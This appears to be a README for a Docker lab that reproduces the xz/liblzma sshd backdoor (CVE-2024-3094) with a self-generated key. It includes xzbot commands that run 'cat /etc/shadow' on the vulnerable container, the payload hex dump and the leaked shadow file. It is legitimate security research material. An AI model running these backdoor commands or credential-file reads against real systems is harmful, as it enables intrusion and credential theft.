Docker testbed for xz backdoor (CVE-2024-3094) - xzbot
This testbed create a testbed for the xz sshd backdoor based on amlweems' incredible reverse engineering work on the xz backdoor.
Do not forget to fetch submodule, see top-level README for more info.
git submodule update --init --recursiveDocker compose will:
- Create a patched version of
liblzma.so.5.6.1as described here - Create a vulnerable container with openssh server, copying the patched
liblzma.so.5.6.1 - Create an attack container, with
xzbotready to be used.
Build:
makeExecute the backdoor
The ed448 key pair is generated from a random seed.
Info on the key and its seed are printed out and stored in /exploit/ed448info.txt
docker exec xzbackdoor-poc sed \
-n 's/^Seed: \([0-9][0-9]*\)/\1/p' /exploit/ed448info.txtdocker exec xzbackdoor-poc /exploit/xzbot/xzbot \
-addr xzbackdoor-vulnerable:22 \
-seed "<seed>" \
-cmd "cat /etc/shadow > /tmp/.xz"
00000000 00 00 00 1c 73 73 68 2d 72 73 61 2d 63 65 72 74 |....ssh-rsa-cert|
00000010 2d 76 30 31 40 6f 70 65 6e 73 73 68 2e 63 6f 6d |[email protected]|
00000020 00 00 00 00 00 00 00 03 01 00 01 00 00 01 01 01 |................|
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000080 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000000a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000000b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000000c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000000d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000000e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000000f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000130 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 |................|
00000140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000160 00 00 01 14 00 00 00 07 73 73 68 2d 72 73 61 00 |........ssh-rsa.|
00000170 00 00 01 01 00 00 01 00 02 00 00 00 01 00 00 00 |................|
00000180 00 00 00 00 00 00 00 00 2f 7c 94 73 94 ed 21 32 |......../|.s..!2|
00000190 8b c8 52 cc a7 3e d2 0f 7e 3f 8f 0b 87 89 84 6b |..R..>..~?.....k|
000001a0 4e 0b 0a 63 9c b9 60 46 49 09 1d 39 4f e5 73 aa |N..c..`FI..9O.s.|
000001b0 7f 73 52 19 32 29 bd 6b 57 a9 02 33 9d 91 9f b6 |.sR.2).kW..3....|
000001c0 ba 37 dc 93 33 c4 f1 1c 6d 0c 15 08 18 b4 a3 28 |.7..3...m......(|
000001d0 8f 18 b5 3d 1c 97 83 e0 03 da e6 76 97 04 d0 fc |...=.......v....|
000001e0 25 e7 2f b1 c0 7b 8a 16 5a 48 65 b0 0c cb c6 db |%./..{..ZHe.....|
000001f0 0f 74 f5 de 10 b6 05 f5 62 fd c4 45 01 62 f8 f6 |.t......b..E.b..|
00000200 a3 39 e7 ff 0e 20 bf 5a 59 7e 6c 7a 03 da e3 63 |.9... .ZY~lz...c|
00000210 17 08 03 09 d9 fa ee 76 74 66 00 00 00 00 00 00 |.......vtf......|
00000220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000270 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 07 |................|
00000280 73 73 68 2d 72 73 61 00 00 00 01 00 |ssh-rsa.....|
2024/04/02 19:13:59 ssh: handshake failed: EOFCheck results
docker exec xzbackdoor-vulnerable cat /tmp/.xz
root:*:19793:0:99999:7:::
daemon:*:19793:0:99999:7:::
bin:*:19793:0:99999:7:::
sys:*:19793:0:99999:7:::
sync:*:19793:0:99999:7:::
games:*:19793:0:99999:7:::
man:*:19793:0:99999:7:::
lp:*:19793:0:99999:7:::
mail:*:19793:0:99999:7:::
news:*:19793:0:99999:7:::
uucp:*:19793:0:99999:7:::
proxy:*:19793:0:99999:7:::
www-data:*:19793:0:99999:7:::
backup:*:19793:0:99999:7:::
list:*:19793:0:99999:7:::
irc:*:19793:0:99999:7:::
_apt:*:19793:0:99999:7:::
nobody:*:19793:0:99999:7:::
sshd:!:19814::::::Interactively play with the patching script
docker exec -it xzbackdoor-poc bash
. /opt/venv/bin/activate
python3 /exploit/patch/patch.py
usage: patch.py [-h] [-s SEED] path
patch.py: error: the following arguments are required: pathClean everything up
make cleanCompile a patched openssh-portable to create a honeypot and test the backdoor.